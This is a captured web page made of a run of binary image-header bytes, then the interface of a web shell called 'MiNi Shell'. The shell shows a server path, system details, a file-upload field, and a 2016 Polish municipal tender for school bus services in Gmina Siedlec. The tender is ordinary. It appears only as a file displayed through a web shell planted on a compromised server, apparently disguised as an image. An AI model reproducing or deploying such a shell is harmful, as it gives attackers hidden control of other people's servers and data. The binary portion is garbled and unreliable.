JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160629/109625-N-2016.html

<p class="kh_header"><b>Siedlec: Dowozy dzieci szkolnych do szkół na terenie Gminy Siedlec oraz do szkoły specjalnej w Wolsztynie</b><br>
<b>Numer ogłoszenia: 109625 - 2016; data zamieszczenia: 29.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Siedlec , ul. Zbąszyńska 17, 64-212 Siedlec, woj. wielkopolskie, tel. 68 3848521, faks 68 3848473.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siedlec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowozy dzieci szkolnych do szkół na terenie Gminy Siedlec oraz do szkoły specjalnej w Wolsztynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są dowozy dzieci do szkół na terenie gminy Siedlec oraz do szkoły specjalnej w Wolsztynie na rok szkolny 2016/2017.
Usługa dowozu świadczona będzie  z wyłączeniem dni wolnych od zajęć szkolnych, we wszystkie dni nauki szkolnej, tzn. usługa świadczona będzie w dni powszednie                   z wyjątkiem świąt i innych dni ustawowo wolnych od pracy a także przerw                        w realizacji zajęć dydaktyczno-wychowawczych, określonych na podstawie przepisów rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r.             w sprawie organizacji roku szkolnego (Dz. U. z 2002 r. Nr 46, poz. 432 z późn. zm.).
2.  Zamawiający wymaga, aby dowóz uczniów był skorelowany z godzinami rozpoczęcia i zakończenia zajęć lekcyjnych wynikającymi z planu lekcji, który będzie obowiązywał w roku szkolnym 2016/2017 oraz umożliwiał uczniom przewóz na rozpoczęcie i zakończenie roku szkolnego oraz egzaminy.
3. Uczniowie muszą być przywiezieni do szkoły najpóźniej na 5 minut przed rozpoczęciem zajęć lekcyjnych i nie wcześniej niż 15 minut przed rozpoczęciem zajęć lekcyjnych. Godziny dowozu muszą umożliwiać dowożonym uczniom punktualne rozpoczęcie zajęć lekcyjnych.
4, Szkołami wiodącymi, które będą dysponentami autobusów są: Zespół Szkoły Podstawowej i Gimnazjum w Tuchorzy, Zespół Przedszkola, Szkoły Podstawowej               i Gimnazjum w Belęcinie, Zespół Przedszkola, Szkoły Podstawowej i Gimnazjum            w Kopanicy, Zespół Szkoły Podstawowej i Gimnazjum w Siedlcu,  Zespół Przedszkola, Szkoły Podstawowej i Gimnazjum w Chobienicach i Szkoła Specjalna          w Wolsztynie.
5.  Przewozy odbywać się będą na trasach:


a) Zespół Szkoły Podstawowej i Gimnazjum, Siedlec:

    dowozy:
    - Żodyń - Siedlec - 1 kurs (ok. 50 osób),
    - Siedlec - Żodyń - Siedlec - 1 kurs (ok. 50 osób),
    - Siedlec - Nieborza - Siedlec - 1 kurs (ok. 40 osób),
    - Siedlec - Kiełkowo - Siedlec - 1 kurs (ok. 30 osób),
    - Siedlec - Karna - Reklinek - Reklin - Siedlec - 2 kursy (ok. 50 osób),
odwozy:
    - Siedlec - Żodyń - Kiełkowo - Siedlec (ok. 50 osób) - 3 kursy + 1 kurs ok. godz. 16.00 po zajęciach pozalekcyjnych (ilość osób w zależności od potrzeb od 10 do 25 osób),
    - Siedlec - Nieborza - Karna - Reklin - Reklinek - Reklin - Siedlec (ok. 50 osób) 3 kursy + 1 kurs ok. godz. 16.00 po zajęciach pozalekcyjnych w zależności od potrzeb od 10 do 25 osób).
Wymagane: 2 autobusy pow. 50 osób.

b) Zespół Przedszkola, Szkoły Podstawowej i Gimnazjum, Belęcin:
     dowozy:
    - Godziszewo - Belęcin, 1 kurs (ok. 42 osoby),
    - Zakrzewo - Belęcin, 1 kurs (ok. 35 osób),
    - Zakrzewo (bloki) - Belęcin, 1 kurs (ok. 21 osób),   
    odwozy:
    - Belęcin - Godziszewo, 4 kursy (ok. 95 osób),
Wymagane: 1 autobus pow. 50 osób.

c) Zespół Przedszkola, Szkoły Podstawowej i Gimnazjum, Chobienice:
    dowozy:
    - Chobienice - Wojciechowo - Grójec Wielki - Grójec Mały  - Chobienice, 1 kurs (ok. 51 osób),
    odwozy:
    - Chobienice - Wojciechowo - Grójec Wielki - Grójec Mały  - Chobienice, 3 kursy (ok. 51 osób),
Wymagane: 1 autobus pow. 50 osób.

d) Zespół Szkoły Podstawowej i Gimnazjum w Tuchorzy:
     dowozy:
     - Tuchorza - Nowa Tuchorza - Tuchorza, 1 kurs (ok. 24 osoby + przedszkolaki),
     - Tuchorza - Stara Tuchorza - Tuchorza, 1 kurs (ok. 38 osób),
     - Tuchorza - Kiełpiny - Tuchorza, 1 kurs (ok. 39 osób),
     - Tuchorza - Stara Tuchorza - Tuchorza, 1 kurs (ok. 24 osoby + przedszkolaki),
     - Tuchorza - Kiełpiny - Tuchorza, 1 kurs (ok. 34 osób),
     - Belęcin - Mariankowo - Boruja jezioro - Tuchorza, 1 kurs (ok. 40 osób),
     - Tuchorza - Nowa Tuchorza - Mariankowo - Boruja - Tuchorza (przedszkole),                1 kurs, (ok. 40),
    odwozy:
   - Tuchorza - Stara Tuchorza - Kiełpiny - Tuchorza, 1 kurs, (ok. 40 osób),
   - Tuchorza - Nowa Tuchorza - Boruja - Mariankowo - Tuchorza, 1 kurs (ok. 40 osób),
   - Tuchorza - Stara Tuchorza - Kiełpiny - Tuchorza, 1 kurs (ok. 24 osoby + przedszkolaki),
   - Tuchorza - Nowa Tuchorza - Boruja - Mariankowo - Boruja jezioro - Tuchorza,           1 kurs (ok. 30 osób),
   - Tuchorza - Stara Tuchorza - Kiełpiny - Tuchorza, 1 kurs (ok. 40 osób),
   - Tuchorza - Stara Tuchorza - Kiełpiny - Tuchorza, 1 kurs (ok. 40 osób),
   - Tuchorza przedszkole - Tuchorza - Nowa Tuchorza - Boruja - Mariankowo                  - Tuchorza, przedszkole, 1 kurs, (ok. 20 osób),
   - Tuchorza - Nowa Tuchorza - Boruja - Mariankowo - Tuchorza, 1 kurs (ok. 30 osób),
   - Tuchorza - Stara Tuchorza - Kiełpiny, 1 kurs (ok. 24 osób),
Wymagane: 2 autobusy pow. 50 osób.

e) Zespół Przedszkola Szkoły Podstawowej i Gimnazjum , Kopanica:
    dowozy:
    - Marianice - Jaromierz - Podborowo, 1 kurs (ok. 65 osób),
    - Wielka Wieś (Chojnówka) - Linie - Przeszkoda - Wielka Wieś (górna) - Wielka Wieś (dolna), 1 kurs (ok. 40 osób),
    - Wąchabno - Mała Wieś, 1 kurs (ok. 50 osób),
    odwozy:
    - Marianice - Jaromierz - Podborowo, 1 kurs (ok. 30 osób),
    - Wielka Wieś (Chojnówka) - Linie - Przeszkoda - Wielka Wieś (górna) - Wielka Wieś (dolna) - Wąchabno - Mała Wieś , 1 kurs (ok. 40 osób),
    - Marianice - Jaromierz - Podborowo, 1 kurs (ok. 20 osób),
    - Wielka Wieś (Chojnówka) - Linie - Przeszkoda - Wielka Wieś (górna) - Wielka Wieś (dolna) - Wąchabno - Mała Wieś, 1 kurs (ok. 20 osób),
    - Marianice - Jaromierz - Podborowo, 1 kurs (ok. 30 osób),
    - Wielka Wieś (Chojnówka) - Linie - Przeszkoda - Wielka Wieś (górna) - Wielka Wieś (dolna) - Wąchabno - Mała Wieś, 1 kurs (ok. 30 osób),
   -  wszystkie kierunki po zajęciach pozalekcyjnych (ok. 30 osób).
Wymagane: 1 autobus pow. 50 osób, 1 autobus do 40 osób.

f) szkoła specjalna w Wolsztynie:
   - dzieci z terenu Gminy Siedlec (33osoby).
Wymagane: min.   2 busy z pielęgniarkami.
6.  Uczniowie muszą mieć zapewnione miejsca siedzące. 
7. Zamawiający zapłaci Wykonawcy za każdy kilometr dowozu uczniów od momentu, gdy wsiądzie pierwszy uczeń do momentu gdy wysiądzie ostatni uczeń - nie licząc dojazdu i odjazdu pojazdu do miejsca garażowania.
8. Opieka nad uczniami w czasie przewozu będzie zapewniona przez poszczególne szkoły. Opiekę nad uczniami sprawować będzie opiekun, któremu Wykonawca,               w trakcie pełnienia jego obowiązków służbowych, zapewnia bezpłatny przewóz.
9. Wykonawca ma obowiązek zabezpieczyć przewozy szkolne również w momencie awarii autobusu. W razie braku zabezpieczenia, o którym mowa powyżej Wykonawca ponosi całkowite koszty zleconych przewozów szkolnych.
10. Czas pracy przewoźnika oraz ilość przebytych kilometrów dziennie będzie wynikać  z rozkładu zajęć w poszczególnych szkołach, potwierdzonych przez dyrektorów szkół.
11. Wykonawca jest zobowiązany do ustalenia optymalnego rozkładu jazdy mając na uwadze jak najkrótszy czas przebywania osoby przewożonej w podróży.
12. Na przewozy dzieci do szkoły specjalnej w Wolsztynie należy podstawić samochód typu BUS (min. 2) przystosowany do przewozu osób niepełnosprawnych wraz                           z opiekunem.
13. Przybliżona ilość km tygodniowo: 5.244.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości 15.000,00 zł, słownie: piętnaście tysięcy złotych, 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ze spełnienie tego warunku Zamawiający uzna wykazanie, iż Wykonawca posiada aktualną licencję na wykonywanie krajowego transportu drogowego oraz posiadanie certyfikatu kompetencji zawodowych niezbędnych do wykonywania transporty drogowego osób.
Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w zakresie wymienionego punktu na podstawie złożonych dokumentów.
W przypadku składania oferty wspólnej warunki określone w przedmiotowym punkcie winien spełniać każdy z Wykonawców osobno.
ocena na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna wykazanie, iż Wykonawca w okresie ostatnich 3 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie, świadczył lub świadczy należycie usługi przewozu dzieci na rzecz szkół lub innych instytucji, świadczone nieprzerwanie przez okres min. 6 miesięcy w ramach jednej umowy.
Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w zakresie wymienionego punktu na podstawie przedłożonego przez Wykonawcę wykazu usług.
Warunek posiadania wiedzy i doświadczenia nie podlega sumowaniu, oznacza to, że  w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Zamawiający wymaga aby jeden z Wykonawców wykazał w całości samodzielnie spełnienie wyżej wymienionego warunku - wykazał należycie wyżej wymienione usługi przewozu.
W sytuacji polegania na zasobach innego podmiotu - podmiot ten musi być wskazany jako Podwykonawca, który będzie wykonywał usługę  dowozu uczniów.
ocena na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna wykazanie, że Wykonawca posiada co najmniej 8 autobusów (7 autobusów pow. 50 osób i 1 autobus do. 40 osób), oraz posiadanie samochodu typu BUS (min. 2) przystosowanego do przewozu osób niepełnosprawnych wraz z uprawnioną pielęgniarką.
Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w zakresie wymienionego punktu na podstawie przedłożonego przez Wykonawcę wykazu sprzętu.
W przypadku składania oferty wspólnej niniejszy warunek Wykonawcy muszą spełniać łącznie.
ocena na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna wykazanie, iż Wykonawca dysponuje co najmniej 10 kierowcami z odpowiednimi uprawnieniami do kierowania pojazdami  - posiadającymi prawo jazdy do kierowania pojazdami wymienionymi powyżej, aktualnymi badaniami lekarskimi zdolnymi do wykonania przedmiotu zamówienia, które będą uczestniczyć w realizacji zamówienia. 
Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w zakresie wymienionego punktu na podstawie przedłożonego przez Wykonawcę wykazu osób.
W przypadku składania oferty wspólnej niniejszy warunek Wykonawcy muszą spełniać łącznie.
ocena na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie sytuacji ekonomicznej i finansowej:
Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej                        w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia.
W przypadku składania oferty wspólnej niniejszy warunek każdy z Wykonawców winien spełnić osobno.
Dla potwierdzenia spełnienia wyżej opisanego warunku Wykonawca winien złożyć opłaconą polisę ubezpieczeniową.
ocena na zasadzie spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy, parafowany wzór umowy, pełnomocnictwo, wykaz środków transportu</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności faktury - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzania istotnych zmian postanowień zawartej umowy      w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy   w opisanych poniżej sytuacjach.
a)  w przypadku wystąpienia warunków atmosferycznych uniemożliwiających wykonanie przedmiotu umowy (w szczególności: silne opady śniegu, gradobicie, roztopy, wichury), zaistnienie takiej sytuacji wymagać będzie potwierdzenia,
b) w przypadku wystąpienia siły wyższej: np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażające bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
c) w przypadku zmiany harmonogramu przejazdu lub zmiany trasy,
d)  w przypadku urzędowej zmiany stawki podatku od towarów i usług (VAT).
2. W przypadkach wymienionych powyżej Zamawiający może:
          a) zmienić termin wyjazdu, ilość km, trasę, harmonogram, wynagrodzenie,
          b) zmienić stawkę podatku VAT.
3.  Warunki wprowadzenia zmian:
      a) inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
      b) zgoda obu stron umowy,
      c) uzasadnienie zmian,
      d) forma zmian: aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.siedlec.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Siedlec, ul. Zbąszyńska 17, 64-212 Siedlec, pokój nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2016 godzina 09:00, miejsce: Urząd Gminy Siedlec, ul. Zbąszyńska 17, 64-212 Siedlec, pokój nr 1 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com